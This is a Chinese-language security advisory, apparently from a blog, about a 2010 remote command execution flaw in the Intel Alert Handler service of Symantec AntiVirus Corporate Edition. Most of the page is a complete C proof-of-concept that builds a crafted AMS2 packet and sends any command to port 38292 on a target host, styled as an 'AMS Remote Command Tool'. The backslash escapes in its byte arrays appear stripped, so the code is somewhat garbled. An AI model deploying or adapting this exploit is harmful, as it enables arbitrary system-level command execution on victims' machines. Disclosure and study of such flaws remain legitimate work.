发布时间:2010-07-26

影响版本:

Symantec AntiVirus Corporate Edition 9.0

Symantec AntiVirus Corporate Edition 8.0

Symantec AntiVirus Corporate Edition 10.1

Symantec AntiVirus Corporate Edition 10.0

Symantec AntiVirus Corporate Edition 8.1

漏洞描述:

BUGTRAQ ID: 41959

Symantec AntiVirus是非常流行的杀毒解决方案。

Symantec杀毒软件产品中使用Alert Management服务（AMS2）在旧版Symantec Antivirus企业版产品中创建、管理和报告警告。Intel Alert Handler服务（hndlrsvc.exe）为AMS2提供了警告创建和响应功能。由于Symantec产品没有正确地实现这个功能，能够在有漏洞主机的38292端口上创建TCP连接的攻击者可以在主机上执行任意系统级的命令。

<*参考

http://marc.info/?l=bugtraq&m=128015742312602&w=2

测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

// POC code to execute commands on system vulnerable to AMS2

// design flaw of Intel Alert Handler service (hndlrsvc.exe)

// within Symantec SAVCE 10.1.8 and earlier

// ***Created by Spider July 2009***

//--------------------Foofus.net-------------------------

#include <stdio.h>

#include <dos.h>

#include <string.h>

#include <winsock.h>

#include <windows.h>

unsigned char payload[1000];

unsigned char inject1[] =

"xffxffxffxffxffxffxffxffx00x00"

"x02x00x95x94xc0xa8x02x64x00x00x00x00x00x00x00x00"

"xe8x03x00x00x50x52x47x58x43x4ex46x47x10x00x00x00"

"x00x00x00x00x04x41x4cx48x44x5cx46x00x00x01x00x00"

"x00x01x00x0ex00x52x69x73x6bx20x52x65x70x61x69x72"

"x65x64x00x25x00x53x79x6dx61x6ex74x65x63x20x41x6e"

"x74x69x56x69x72x75x73x20x43x6fx72x70x6fx72x61x74"

"x65x20x45x64x69x74x69x6fx6ex00xf9x1dx13x4ax3fx0c"

"x00x4cx41x42x53x59x53x54x45x4dx2dx31x00x08x08x0a"

"x00x52x69x73x6bx20x4ex61x6dx65x00x07x00x05x00x54"

"x65x73x74x00x08x0ax00x46x69x6cx65x20x50x61x74x68"

"x00x07x00x05x00x54x65x73x74x00x08x11x00x52x65x71"

"x75x65x73x74x65x64x20x41x63x74x69x6fx6ex00x07x00"

"x05x00x54x65x73x74x00x08x0ex00x41x63x74x75x61x6c"

"x20x41x63x74x69x6fx6ex00x07x00x05x00x54x65x73x74"

"x00x08x07x00x4cx6fx67x67x65x72x00x07x00x05x00x54"

"x65x73x74x00x08x05x00x55x73x65x72x00x07x00x05x00"

"x54x65x73x74x00x08x09x00x48x6fx73x74x6ex61x6dx65"

"x00x0ex00x0cx00x4cx41x42x53x59x53x54x45x4dx2dx31"

"x00x08x13x00x43x6fx72x72x65x63x74x69x76x65x20x41"

"x63x74x69x6fx6ex73x00x07x00x05x00x54x65x73x74x00"

"x00x07x08x12x00x43x6fx6ex66x69x67x75x72x61x74x69"

"x6fx6ex4ex61x6dx65x00x22x00x20";

unsigned char cmdother[] =

"x00x08x0cx00x43x6fx6dx6dx61x6ex64x4cx69x6ex65";

unsigned char inject2[] =

"x00x08x08x00x52x75x6ex41x72x67x73x00x04x00x02x00"

"x20x00x03x05x00x4dx6fx64x65x00x04x00x02x00x00x00"

"x0ax0dx00x46x6fx72x6dx61x74x53x74x72x69x6ex67x00"

"x02x00x00x00x08x12x00x43x6fx6ex66x69x67x75x72x61"

"x74x69x6fx6ex4ex61x6dx65x00x02x00x00x00x08x0cx00"

"x48x61x6ex64x6cx65x72x48x6fx73x74x00x0bx00x09x00"

"x44x45x41x44x42x45x45x46x00x00x00x00x00";

void banner (char *proga)

{

system("cls");

printf("nUse: %s <ip> <command>n", proga);

}

int main ( int argc, char *argv[] )

{

SOCKET sock;

WSADATA wsa;

struct sockaddr_in addr;

printf(" __ ___ __ __ __ n");

printf(" | / \ | / _/___ |__| _\ |___ _ __ | / \ | n");

printf("\_\\ //_/ \_ \ . \| |/ . / ._\| `_/ \_\\ //_/n");

printf(" .'/()\'. /___/ _/|__|\___\___\|_| .'/()\'. n");

printf(" \ \ / / |_\ \ \ / / n");

printf(" AMS Remote Command Tooln");

int port;

if ( argc < 3 )

{

banner(argv[0]);

exit(0);

}

char *ip_addr = argv[1];

int length = (int)strlen(argv[2]);

if (length > 128)

{

printf("n WARNING WARNING WARNING %s n");

printf("n Input Command String Greater than 128 Characters is not Permited %s n");

exit (0);

}

// building injection packet

inject1[353] = length+3;

inject1[355] = length+1;

memcpy(payload,inject1,356);

int a = 356;

for (int i = 0; i<(length); i++)

{

a=a+1;payload[a] = argv[2][i];

}

int b = a;

for (int i = 0; i<=14; i++)

{

b=b+1;payload[b] = cmdother[i];

}

int c = b;

payload[c+2] = length+3;

payload[c+4] = length+1;

int d = c+5;

for (int i = 0; i<length; i++)

{

d=d+1;payload[d] = argv[2][i];

}

int e = d;

for (int i = 0; i<=109; i++)

{

e=e+1;payload[e] = inject2[i];

}

// setting up socket and sending packet

printf("[] preparing....n");

WSAStartup(MAKEWORD(2,0), &wsa);

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

addr.sin_family = AF_INET;

addr.sin_port = htons(38292);

addr.sin_addr.s_addr = inet_addr(ip_addr);

printf("[] connecting..n");

if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1 )

{ printf("[-] connection failed!n"); exit(0); }

printf("[] sending crafted packet 1 ...n");

if ( send(sock, payload, sizeof(payload), 0) == -1 )

{ printf("[-] send failed!n"); exit(0); }

closesocket(sock);

WSACleanup();

return 0;

}

安全建议:

暂无

厂商补丁：

Symantec

--------

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.symantec.com/

分类

站内搜索

日历

友情链接

访问统计(起于2010/10/2)

Blog